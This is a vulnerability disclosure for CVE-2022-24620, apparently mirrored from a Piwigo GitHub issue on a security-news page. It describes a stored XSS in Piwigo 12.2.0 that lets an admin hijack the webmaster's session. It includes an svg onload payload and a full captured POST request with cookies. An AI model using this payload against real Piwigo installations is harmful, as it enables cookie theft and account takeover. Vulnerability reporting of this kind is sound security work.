Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-24620: Piwigo-12.2.0 Vulnerable For Stored XSS Which Is Leading To Privilege Escalation · Issue #1605 · Piwigo/Piwigo

Piwigo version 12.2.0 is vulnerable to stored cross-site scripting (XSS), which can lead to privilege escalation. In this way, admin can steal webmaster’s cookies to get the webmaster’s access.

CVE
#xss#vulnerability#web#windows#apple#google#js#git

Hi, I found Stored XSS in Piwigo version 12.2.0 (Not tested older versions).

Proof Of Concept:

  1. Add an admin through webmaster’s access.
  2. Through the admin account open http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
  3. Add < svg onload=alert(1)> (Remove space) in the group name field.

Can use any malicious JS code, Now you can see XSS will pop-up.

Impact:

In this way admin can easily takeover webmaster’s access using this technique.

Burp:

POST http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,hi;q=0.8
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Cookie: pwg_id=lq5gpi2eacbfhhp9ckm0i60ee0; pwg_album_manager_view=tile; pwg_user_manager_view=line; PHPSESSID=hjg1fi2funadnubkkvb7381ede
Host: localhost
Origin: http://localhost
Referer: http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list
sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36

pwg_token=4feeb12539296772205ca90e39d382aa&virtual_name=%3Csvg+onload%3Dalert%281%29%3E&submitAdd=

Screenshot - 2_3_2022 , 12_42_32 AM

Please fix the vulnerability & let me know :).

Thank You!

  • Chirag Artani

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907